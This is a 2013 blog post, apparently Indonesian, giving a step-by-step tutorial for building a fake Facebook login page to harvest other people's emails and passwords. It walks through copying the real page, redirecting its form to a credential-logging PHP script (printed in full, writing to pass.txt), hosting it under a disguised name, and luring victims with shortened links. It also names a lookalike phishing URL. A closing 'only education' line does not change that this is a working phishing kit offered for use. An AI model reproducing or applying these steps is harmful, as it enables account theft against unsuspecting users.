Selasa, 22 Oktober 2013

10 STEPS FACEBOOK HACKING TECHNIQUE USING FAKE LOGIN


facebook login



Okay , I do not have time to write on the internet . This time I want to share the science of how to do make a fake Facebook login .
What is a fake login ? Fake login is an artificial interface that resembles a website in order to fool the target so that the email and password confidential knowable . How? Follow carefully stage that I will give .
Internet connection
Sign in to http://www.facebook.com/login.php/
Right click and choose save as or save page as
Then you will have a file called " Log Facebook.htm " a collection of files and folders named " Log Facebook_Files "
In the file " Log Facebook.htm " right click , open in notepad and change the code <div> < form id = " login_form " action = " https://www.facebook.com/login.php?login_attempt=1 " method = " post " to <div> < form id = " login_form " action = " " next.php method = " post" to find it , enough with the " ctrl + f " ( find ) and do not forget to save
You must have a hosting and domain first. If I use 000webhost.com with a url that has been given from 000webhost ( more detail to find a way how to make a web )
Upload file " Log Facebook.htm " and change the name to whatever name you want but do not be printed the word " facebook "
Upload files that exist in the " Log Facebook_Files " to hosting you've made
Create a php script with the name " next.php " with notepad , then change the extension from . Txt to . Php ( which you need to fill I will give below ) and then uploaded to a hosting site where you put the file extention . Htm earlier .
Good Job ! now lives give the fake login URL to your friends or randomly spread with frills of new applications or new ways in facebook login . Or if you want more cheat , use URL shortner like bit.ly or tinyurl .
If successful , then at the place where you upload the file would be a new file named pass.txt tebuat containing a target's email and password . This is it fake user interface that I have made http://facesbook.site11.com/New % 20log % 20In.htm
next.php script
< ? php
header ( " Location : http://www.Facebook.com/login.php " ) ;
$ handle = fopen ( " pass.txt " , " a " ) ;
foreach ( $ _GET as $ variable = > $ value ) {
fwrite ( $ handle , $ variable ) ;
fwrite ( $ handle , " = " ) ;
fwrite ( $ handle , $ value ) ;
fwrite ( $ handle , " \ r \ n " ) ;
}
fwrite ( $ handle , " \ r \ n " ) ;
fclose ( $ handle ) ;
exit ;
? >
Attetion : This article only is education , the value obtained is do not ever login from facebook.com url besides . Sorry for no picture for tutorial . Greetings .

Tidak ada komentar:

Posting Komentar